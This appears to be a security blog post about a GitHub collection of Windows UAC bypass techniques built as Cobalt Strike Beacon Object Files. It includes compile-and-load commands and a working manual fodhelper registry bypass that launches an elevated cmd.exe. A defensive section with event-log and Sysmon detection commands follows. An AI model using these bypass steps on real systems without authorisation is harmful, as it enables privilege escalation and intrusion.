Listen to this Post
This repository by icyguider is a goldmine for red teamers and penetration testers, offering a collection of UAC (User Account Control) bypass techniques weaponized as BOFs (Beacon Object Files). UAC is a security feature in Windows designed to prevent unauthorized changes, but attackers often bypass it to escalate privileges.
🔗 GitHub URL: https://github.com/icyguider/UAC-BOF-Bonanza
You Should Know:
1. What Are BOFs (Beacon Object Files)?
BOFs are lightweight post-exploitation tools used in Cobalt Strike and other C2 frameworks. They execute in-memory, reducing detection risks.
2. Common UAC Bypass Techniques Included:
- FodHelper Bypass (Exploits the Windows “Features on Demand” helper)
- Event Viewer Bypass (Abuses Microsoft Management Console)
- ComputerDefaults Bypass (Leverages registry hijacking)
3. Practical Usage & Commands
To compile and use a BOF from the repository:
<h1>Clone the repository</h1> git clone https://github.com/icyguider/UAC-BOF-Bonanza.git cd UAC-BOF-Bonanza <h1>Compile a BOF (example: fodhelper.c)</h1> x86_64-w64-mingw32-gcc -o fodhelper.o -c fodhelper.c -masm=intel <h1>Load into Cobalt Strike</h1> inline-execute /path/to/fodhelper.o
4. Manual UAC Bypass via Registry (For Testing)
<h1>Create a registry key for fodhelper bypass</h1> New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(Default)" -Value "cmd.exe" -Force Start-Process "fodhelper.exe"
#### **5. Defensive Measures (Blue Team)**
- Monitor registry modifications:
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4657} | Where-Object {$_.Message -like "*ms-settings*"} - Enable UAC at highest level:
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 2
### **What Undercode Say:**
UAC bypass techniques remain a critical attack vector in Windows environments. While tools like UAC-BOF-Bonanza simplify exploitation, defenders must:
– Log and audit registry changes
– Restrict PowerShell execution (Restricted mode)
– Use AppLocker to block unsigned executables
– Deploy Sysmon for deep process monitoring
**Additional Useful Commands:**
<h1>Check UAC level via CMD</h1>
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA
<h1>List all scheduled tasks (common UAC bypass target)</h1>
schtasks /query /fo LIST /v
<h1>Detect suspicious parent-child processes (Sysmon)</h1>
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; ID=1} | Where-Object {$_.Message -like "*fodhelper*"}
### **Expected Output:**
A functional BOF-loaded UAC bypass in Cobalt Strike or manual registry exploitation leading to cmd.exe spawning with elevated privileges. Defenders should see Event ID 4657 (registry changes) and 4688 (new process creation) in logs.
🔗 Reference: Microsoft UAC Documentation
References:
Reported By: Florian Hansemann – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅



